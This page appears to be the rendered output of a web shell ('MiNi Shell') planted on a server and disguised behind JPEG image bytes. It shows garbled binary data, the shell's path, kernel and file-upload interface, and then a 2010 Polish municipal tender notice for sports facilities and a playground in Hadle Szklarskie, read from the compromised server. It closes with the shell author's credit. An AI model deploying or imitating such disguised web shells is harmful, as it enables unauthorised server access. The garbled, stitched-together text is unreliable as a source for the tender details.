JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/18451-N-2010.html

<p class="kh_header"><b>Jawornik Polski: Budowa zaplecza sportowo - rekreacyjnego obejmującego: boisko piłkarskie, kort tenisowy oraz urządzenie placu zabaw w Hadlach Szklarskich</b><br>
<b>Numer ogłoszenia: 18451 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jawornik Polski , Jawornik Polski 30, 37-232 Jawornik Polski, woj. podkarpackie, tel. 016 6514014 w. 26, faks 016 6514055.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jawornikpolski.itl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zaplecza sportowo - rekreacyjnego obejmującego: boisko piłkarskie, kort tenisowy oraz urządzenie placu zabaw w Hadlach Szklarskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa zaplecza sportowo - rekreacyjnego obejmującego: boisko piłkarskie, kort tenisowy oraz urządzenie placu zabaw w Hadlach Szklarskich
Boisko sportowe do piłki nożnej:
O wymiarach 70,0x45,0 m  o powierzchni całkowitej 3150 m2 (pole do gry 62,0x37,0 m) o nawierzchni naturalnej trawiastej wykonanej poprzez wysiew mieszanki trawy na uprzednio przygotowanym podłożu złożonym z warstw konstrukcyjnych płyty boiska. Zasianie traw nastąpi ręcznie na gł. ok 2 cm warstwy wegetacyjnej. Ilość nasion 1m2  wynosi 25-30g. Warstwa wegetacyjna wykonana jest nad warstwą odcinającą i umożliwia prawidłowy rozrost korzeni traw. Stanowi ona mieszankę gruntu rodzimego oraz piasku o uziarnieniu 0,2-2,0 mm zmieszaną mechanicznie w stosunku 1:1.
Powierzchnia pasa bezpieczeństwa o szerokości 4,0 m wokół linii boiska wynosi 856 m2 
Konstrukcja płyty boiska:
- warstwa trawnika gr. 2 cm
- warstwa wegetacyjna gr. 15 cm
- warstwa wyrównująca z miału kamiennego 0-4 mm - gr. 2 cm
- górna warstwa podbudowy z klinca kamiennego 0-31,5 mm - gr. 8 cm
- dolna warstwa podbudowy z tłucznia kamiennego 31,5-63 mm - gr. 15 cm
- warstwa odsączająca z piasku gr 15 cm
Razem warstwa płyty boiska będzie wynosić 57 cm.
Odwodnienie boiska:
Projektowane odwodnienie wykonane zostanie z rur drenarskich karbowanych PCV-U  80-70  z otworami drenarskimi 1,5x5,0 mm. Projektowane ciągi drenarskie rozmieszczono równolegle do siebie w odległości 5,0 m. Połączenie z kolektorami zbiorczymi następuje poprzez studzienki rewizyjne drenarskie. Układanie rur drenarskich na dnie wykopu przeprowadza się na podłożu całkowicie odwodnionym i z wyprofilowanym dnem na łożysko nośne rury kanałowej - zgodnie z zaprojektowanymi spadkami. Budowę drenaży rozpoczyna się od punktów węzłowych - studzienek drenarskich rewizyjnych z obsadzonymi zgodnie z zaprojektowanymi rzędnymi.
Budowę drenaży prowadzi się z ustalonymi spadkami pomiędzy punktami węzłowymi od rzędnych niższych do wyższych. Wyrównanie spadków rury poprzez podkładanie pod rurę kawałków drewna, kamieni lub gryzu jest niedopuszczalne - rura wymaga podbicia na całej długości. Ułożone rury - po uprzednim sprawdzeniu prawidłowości jej spadku, wymaga zastabilizowania przez wykonanie opsypki filtracyjnej z pospółki.
Jako kolektor zbiorczy projektuje się zastosowanie rur kanalizacyjnych PCV kielichowych typ średni N łączonych na uszczelkę  200.
Rury kolektora zbiorczego układa się na gruncie rodzimym z opsypkami do wysokości 20 cm i zagęszczeniem do 80 % gruntem rodzimym - przy gruntach suchych. W przypadku wystąpienia tzw. przekopu - nadmiernego wybrania gruntu rodzimego, przekop należy wypełnić ubitym piaskiem. Studzienki rewizyjne kolektora zbiorczego z PCW 400 natomiast końcowa studnia bez dopływowa betonowa  1000.
Odprowadzenie wody ze studzienki bez dopływowej nastąpi poprzez wypompowanie pompą zasilana agregatem prądotwórczym.
Ogrodzenie boiska:
Na terenie boiska do piłki nożnej wykonać należy na krótszych bokach boiska za bramkami tzw. piłkochwyty o wysokości 6 m. Piłkochwyty na słupkach stalowych na podmurówce betonowej. Wypełnienie z siatki stalowej. Rozstaw słupków do 3 m. 
Kort tenisowy
O wymiarach 25,0x10,0 m o nawierzchni maczki ceglanej na uprzednio przygotowanym podłożu złożony z warstw konstrukcyjnych płyty.
Powierzchnia projektowanego terenu kortu tenisowego wynosi 250  m2.
Nawierzchnia z mączki ceglanej wymaga corocznej renowacji oraz zabiegów konserwacyjnych w czasie eksploatacji takich jak: uzupełnianie maczki ceglanej, wyrównywanie, siatkowanie i podlewanie.
Odwodnienie kortu tenisowego:
Projektowane odwodnienie wykonane zostanie z rur drenarskich karbowanych PCV-U 80/70  z otworami drenarskimi 1,5x5,0 mm. Projektowane ciągi drenarskie rozmieszczono równolegle do siebie w odległości 5,0 m. Połączenie z kolektorami zbiorczymi następuje poprzez studzienki rewizyjne drenarskie. Układanie rur drenarskich na dnie wykopu przeprowadza się na podłożu całkowicie odwodnionym i z wyprofilowanym dnem na łożysko nośne rury kanałowej - zgodnie z zaprojektowanymi spadkami. Budowę drenaży rozpoczyna się od punktów węzłowych - studzienek drenarskich rewizyjnych z obsadzonymi zgodnie z zaprojektowanymi rzędnymi.
Budowę drenaży prowadzi się z ustalonymi spadkami pomiędzy punktami węzłowymi od rzędnych niższych do wyższych. Wyrównanie spadków rury poprzez podkładanie pod rurę kawałków drewna, kamieni lub gryzu jest niedopuszczalne - rura wymaga podbicia na całej długości. Ułożone rury - po uprzednim sprawdzeniu prawidłowości jej spadku, wymaga zastabilizowania przez wykonanie obsypki filtracyjnej z pospółki.
Jako kolektor zbiorczy projektuje się zastosowanie rur kanalizacyjnych PCV kielichowych typ średni N łączonych na uszczelkę 200.
Rury kolektora zbiorczego układa się na gruncie rodzimym z obsypkami do wysokości 20 cm i zagęszczeniem do 80 % gruntem rodzimym - przy gruntach suchych. W przypadku wystąpienia tzw. przekopu - nadmiernego wybrania gruntu rodzimego, przekop należy wypełnić ubitym piaskiem. Studzienki rewizyjne kolektora zbiorczego z PCW 400 natomiast końcowa studnia bez dopływowa betonowa 1000.
Odprowadzenie wody ze studzienki bez dopływowej nastąpi poprzez wypompowanie pompą zasilana agregatem prądotwórczym.
Ogrodzenie kortu tenisowego:
Ogrodzenie kortu tenisowego wykonać na słupkach stalowych mocowanych na podmurówce betonowej. Wypełnienie z siatki stalowej - wysokość 3 m. Rozstaw słupków do 3 m. Furtka rozwierana o szerokości 1,5 m.
Plac zabaw
Całkowita powierzchnia placu zabaw będzie wynosić 899,006 m2.
Urządzenie placu zabaw obejmuje następujący zakres robót:
wykonanie dołów o powierzchni dna do 0,2 m2 i głębokości do 1,0 m w gruncie - 25 szt.
betonowanie stóp i płyt fundamentowych niezbrojonych w deskowaniu tradycyjnym betonem B-15, (fundamenty słupków ogrodzenia 2,250 m3, 
wykonanie ogrodzenia - sztachety z listew o rozstawie co 10 cm o wysokości 1,20 cm, 73,200 m2
koryta wykonanie ręcznie - głębokość 20 cm w gruncie na całej szerokości jezdni i chodników - 105,00 m2
koryta wykonane ręcznie - głębokość 10 cm w gruncie na całej szerokości jezdni i chodników (pod maty zabezpieczające), 295,576 m2
warstwy odcinające zagęszczane ręcznie o grubości 5 cm pod maty zabezpieczające, 295,576 m2
warstwy odcinające zagęszczane ręcznie o grubości 10 cm pod płyty chodnikowe, 105,00 m2
chodniki z płyt betonowych o wymiarach 50x500x7 cm na podsypce piaskowej, spoiny wypełnione piaskiem - alternatywa płyty EKO o wymiarach 60x40x8 cm, 105,00 m2 
ręczne przekopanie gleby na terenie płaskim w gruncie zadarnionym, 498,43 m2 
ręczne rozrzucenie torfu na terenie płaskim - grubość warstwy 2 cm, 0,0499 ha
wykonanie trawników dywanowych siewem na gruncie bez nawożenia 498,43 m2 
wykonanie izolacji cieplnych i przeciwdźwiękowych z płyt wiórowo - cementowych poziome na sucho. - ALTERNATYWA - wykonanie bezpiecznych nawierzchni z maty gumowej przerostowej pojedyncza na gotowym podłożu, 295,576 m2 
Wyposażenie placu zabaw obejmuje następujące urządzenia:
- Karuzela - wym. 160x160 cm - 1 kpl.
- Kucyk - wym 41x177 cm - 1 kpl.
- Piaskownica - wym. 202x202 cm - 1 kpl.
- Lokomotywa - wym. 644x123 cm - 1 kpl.
- Huśtawka - wym. 719x186 cm - 1 kpl.
- Baza Korsarzy Nature - wym. 921x520 cm - 1 kpl.
- Ławka modrzewiowa wkopana w ziemię  - wym. 180x51 cm - 10 szt.
- Ławka/stół modrzewiowy, ocynkowana stal - wym. 180x189 cm - 2 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 37.53.52.00-9, 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawcy wniesienia wadium w wysokości 11 327,60 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne może ubiegać się Wykonawca, który: 
- spełnia warunki zawarte w art. 22 ust. 1 ustawy tzn:
- posiada uprawnienia do wykonywania określonej działalności lub czynności 
- posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia 
- znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie
art. 24 ustawy oraz: 
- musi wykazać wykonanie robót budowlanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie 
- musi dysponować pracownikami posiadającymi uprawnienia niezbędne do kierowania robotami budowlanymi tj. kierownika budowy posiadającego uprawnienia budowlane oraz będącego członkiem właściwej izby samorządu zawodowego 
- musi przedstawić wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności 
- musi udzielić minimum 36-cio miesięcznej gwarancji na wykonanie roboty 
- musi dysponować środkami finansowymi lub zdolnością kredytową w wysokości równej oferowanej wartości zamówienia 
- musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej 
Ocena spełnienia wymaganych warunków od Wykonawców zostanie dokonana w systemie spełnia/nie spełnia, na podstawie dokumentów wymienionych w Rozdziale VI SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony Formularz oferty - Załącznik Nr 1 do SIWZ, 
2. Kosztorys ofertowy - Załącznik Nr 2 do WSIZ.
3. Oświadczenie Wykonawcy w trybie art. 22 ust. 1 oraz 24 ustawy Pzp. - Załącznik Nr 3  do SIWZ,
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert
5. Aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionych nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
6. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
7. Doświadczenie zawodowe Wykonawcy (wykaz zrealizowanych zamówień o podobnym zakresie) - Załącznik Nr 4 do SIWZ
8. Potencjał kadrowy (wykaz osób, które będą realizować zamówienie) - Załącznik Nr 5 do SIWZ
9. Sprawozdanie finansowe, jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty (np. PIT-36), zysk oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres obrotowy jest krótszy - za ten okres
10. Polisa lub inny dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w dniu podpisania umowy
11. Informacja banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 m-ce przed upływem terminu składania ofert
12. Dowód wniesienia wadium - oryginał (z tym że w dniu składania ofert kwota wadium musi być fizycznie na koncie bankowym Zamawiającego)
Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów. Pełnomocnictwo podlega opłacie skarbowej zgodnie z ustawą z dnia 09.09.2000 r. o opłacie skarbowej (Dz.U. z 17.10.2000 r.).
14. Projekt umowy - Załącznik Nr 6 do WSIZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jawornikpolski.itl.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.jawornikpolski.itl.pl/bip.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2010 godzina 10:00, miejsce: Urząd Gminy Jawornik Polski
37-232, woj. podkarpackie
I piętro, sekretariat, pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com